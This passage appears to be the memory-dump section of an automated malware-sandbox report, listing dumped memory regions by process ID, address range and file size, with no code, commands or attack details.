                          • memory/964-237-0x0000016B2A900000-0x0000016B2AA05000-memory.dmp
                            Filesize

                            1.0MB

                          • memory/964-235-0x0000016B27EE0000-0x0000016B27EE2000-memory.dmp
                            Filesize

                            8KB

                          • memory/964-234-0x0000016B27EE0000-0x0000016B27EE2000-memory.dmp
                            Filesize

                            8KB

                          • memory/1032-118-0x0000000000E80000-0x0000000000E81000-memory.dmp
                            Filesize

                            4KB

                          • memory/1044-203-0x000002BE68FF0000-0x000002BE68FF2000-memory.dmp
                            Filesize

                            8KB

                          • memory/1044-202-0x000002BE68FF0000-0x000002BE68FF2000-memory.dmp
                            Filesize

                            8KB

                          • memory/1044-217-0x000002BE69A00000-0x000002BE69A72000-memory.dmp
                            Filesize

                            456KB

                          • memory/1116-216-0x000001E78F670000-0x000001E78F6E2000-memory.dmp
                            Filesize

                            456KB

                          • memory/1116-201-0x000001E78ECD0000-0x000001E78ECD2000-memory.dmp
                            Filesize

                            8KB

                          • memory/1116-200-0x000001E78ECD0000-0x000001E78ECD2000-memory.dmp
                            Filesize

                            8KB

                          • memory/1224-229-0x00000253DB610000-0x00000253DB682000-memory.dmp
                            Filesize

                            456KB

                          • memory/1224-222-0x00000253DB290000-0x00000253DB292000-memory.dmp
                            Filesize

                            8KB

                          • memory/1224-221-0x00000253DB290000-0x00000253DB292000-memory.dmp
                            Filesize

                            8KB

                          • memory/1328-243-0x0000000000000000-mapping.dmp
                          • memory/1328-257-0x000000001C9F0000-0x000000001C9F2000-memory.dmp
                            Filesize

                            8KB

                          • memory/1400-224-0x000001E3A0310000-0x000001E3A0312000-memory.dmp
                            Filesize

                            8KB

                          • memory/1400-230-0x000001E3A0C00000-0x000001E3A0C72000-memory.dmp
                            Filesize

                            456KB

                          • memory/1400-223-0x000001E3A0310000-0x000001E3A0312000-memory.dmp
                            Filesize

                            8KB

                          • memory/1448-205-0x00000210C3190000-0x00000210C3192000-memory.dmp
                            Filesize

                            8KB

                          • memory/1448-218-0x00000210C3970000-0x00000210C39E2000-memory.dmp
                            Filesize

                            456KB

                          • memory/1448-204-0x00000210C3190000-0x00000210C3192000-memory.dmp
                            Filesize

                            8KB

                          • memory/1652-176-0x0000000000000000-mapping.dmp
                          • memory/1652-181-0x0000000000400000-0x0000000000414000-memory.dmp
                            Filesize

                            80KB

                          • memory/1656-251-0x0000000000000000-mapping.dmp
                          • memory/1792-233-0x0000000000000000-mapping.dmp
                          • memory/1820-219-0x000002194EAD0000-0x000002194EB42000-memory.dmp
                            Filesize

                            456KB

                          • memory/1820-206-0x000002194E380000-0x000002194E382000-memory.dmp
                            Filesize

                            8KB

                          • memory/1820-207-0x000002194E380000-0x000002194E382000-memory.dmp
                            Filesize

                            8KB

                          • memory/1840-123-0x0000000002E76000-0x0000000002EF3000-memory.dmp
                            Filesize

                            500KB

                          • memory/1840-156-0x0000000004A50000-0x0000000004B26000-memory.dmp
                            Filesize

                            856KB

                          • memory/1840-120-0x0000000000000000-mapping.dmp
                          • memory/1840-164-0x0000000000400000-0x0000000002E0F000-memory.dmp
                            Filesize

                            42.1MB

                          • memory/1976-255-0x0000000000EF0000-0x0000000000EF1000-memory.dmp
                            Filesize

                            4KB

                          • memory/1976-258-0x000000001CB40000-0x000000001CB42000-memory.dmp
                            Filesize

                            8KB

                          • memory/1976-252-0x0000000000000000-mapping.dmp
                          • memory/2092-163-0x0000000004980000-0x00000000049AF000-memory.dmp
                            Filesize

                            188KB

                          • memory/2092-139-0x0000000000000000-mapping.dmp
                          • memory/2092-165-0x0000000000400000-0x0000000002DAF000-memory.dmp
                            Filesize

                            41.7MB

                          • memory/2196-265-0x0000000002360000-0x0000000002380000-memory.dmp
                            Filesize

                            128KB

                          • memory/2196-259-0x0000000140000000-0x0000000140786000-memory.dmp
                            Filesize

                            7.5MB

                          • memory/2196-264-0x0000000000740000-0x0000000000742000-memory.dmp
                            Filesize

                            8KB

                          • memory/2196-261-0x0000000000710000-0x0000000000730000-memory.dmp
                            Filesize

                            128KB

                          • memory/2196-260-0x000000014030F3F8-mapping.dmp
                          • memory/2196-262-0x0000000140000000-0x0000000140786000-memory.dmp
                            Filesize

                            7.5MB

                          • memory/2196-263-0x0000000000740000-0x0000000000742000-memory.dmp
                            Filesize

                            8KB

                          • memory/2196-266-0x0000000000AC0000-0x0000000000AE0000-memory.dmp
                            Filesize

                            128KB

                          • memory/2224-250-0x0000000000000000-mapping.dmp
                          • memory/2284-175-0x0000000000000000-mapping.dmp
                          • memory/2284-182-0x0000000004926000-0x0000000004A27000-memory.dmp
                            Filesize

                            1.0MB

                          • memory/2284-183-0x0000000004A70000-0x0000000004ACD000-memory.dmp
                            Filesize

                            372KB

                          • memory/2356-215-0x000002208E620000-0x000002208E692000-memory.dmp
                            Filesize

                            456KB

                          • memory/2356-198-0x000002208DE70000-0x000002208DE72000-memory.dmp
                            Filesize

                            8KB

                          • memory/2356-199-0x000002208DE70000-0x000002208DE72000-memory.dmp
                            Filesize

                            8KB

                          • memory/2388-214-0x0000020123F80000-0x0000020123FF2000-memory.dmp
                            Filesize

                            456KB

                          • memory/2388-196-0x0000020123BC0000-0x0000020123BC2000-memory.dmp
                            Filesize

                            8KB

                          • memory/2388-197-0x0000020123BC0000-0x0000020123BC2000-memory.dmp
                            Filesize

                            8KB

                          • memory/2560-189-0x0000023803860000-0x0000023803862000-memory.dmp
                            Filesize

                            8KB

                          • memory/2560-211-0x0000023804300000-0x0000023804372000-memory.dmp
                            Filesize

                            456KB

                          • memory/2560-190-0x0000023803860000-0x0000023803862000-memory.dmp
                            Filesize

                            8KB

                          • memory/2664-226-0x00000216C03A0000-0x00000216C03A2000-memory.dmp
                            Filesize

                            8KB

                          • memory/2664-231-0x00000216C0E00000-0x00000216C0E72000-memory.dmp
                            Filesize

                            456KB

                          • memory/2664-225-0x00000216C03A0000-0x00000216C03A2000-memory.dmp
                            Filesize

                            8KB

                          • memory/2688-228-0x0000015D57370000-0x0000015D57372000-memory.dmp
                            Filesize

                            8KB

                          • memory/2688-227-0x0000015D57370000-0x0000015D57372000-memory.dmp
                            Filesize

                            8KB

                          • memory/2688-232-0x0000015D57C40000-0x0000015D57CB2000-memory.dmp
                            Filesize

                            456KB

                          • memory/2732-172-0x00000000056D0000-0x00000000056D1000-memory.dmp
                            Filesize

                            4KB

                          • memory/2732-158-0x0000000000000000-mapping.dmp
                          • memory/2732-161-0x0000000000DA0000-0x0000000000DA1000-memory.dmp
                            Filesize

                            4KB

                          • memory/3204-149-0x0000000000000000-mapping.dmp
                          • memory/3204-239-0x00000000029A0000-0x00000000029AA000-memory.dmp
                            Filesize

                            40KB

                          • memory/3204-238-0x00000000029C0000-0x00000000029C2000-memory.dmp
                            Filesize

                            8KB

                          • memory/3204-154-0x00000000004E0000-0x00000000004E1000-memory.dmp
                            Filesize

                            4KB

                          • memory/3204-240-0x0000000002A70000-0x0000000002A71000-memory.dmp
                            Filesize

                            4KB

                          • memory/3428-134-0x0000000000000000-mapping.dmp
                          • memory/3428-167-0x0000000000400000-0x0000000000414000-memory.dmp
                            Filesize

                            80KB

                          • memory/3548-145-0x0000000000000000-mapping.dmp
                          • memory/3548-148-0x00000000002A0000-0x00000000002A1000-memory.dmp
                            Filesize

                            4KB

                          • memory/3548-157-0x000000001AF20000-0x000000001AF22000-memory.dmp
                            Filesize

                            8KB

                          • memory/3584-184-0x0000000000000000-mapping.dmp
                          • memory/3584-210-0x00000000001E0000-0x00000000001E1000-memory.dmp
                            Filesize

                            4KB

                          • memory/3808-138-0x000000001B880000-0x000000001B882000-memory.dmp
                            Filesize

                            8KB

                          • memory/3808-132-0x0000000000C40000-0x0000000000C41000-memory.dmp
                            Filesize

                            4KB

                          • memory/3808-128-0x0000000000000000-mapping.dmp
                          • memory/3924-241-0x0000000000000000-mapping.dmp
                          • memory/3928-188-0x000001B157140000-0x000001B157142000-memory.dmp
                            Filesize

                            8KB

                          • memory/3928-186-0x000001B157140000-0x000001B157142000-memory.dmp
                            Filesize

                            8KB

                          • memory/3928-208-0x000001B157190000-0x000001B1571DD000-memory.dmp
                            Filesize

                            308KB

                          • memory/3928-209-0x000001B157650000-0x000001B1576C2000-memory.dmp
                            Filesize

                            456KB

                          • memory/3960-143-0x0000000000000000-mapping.dmp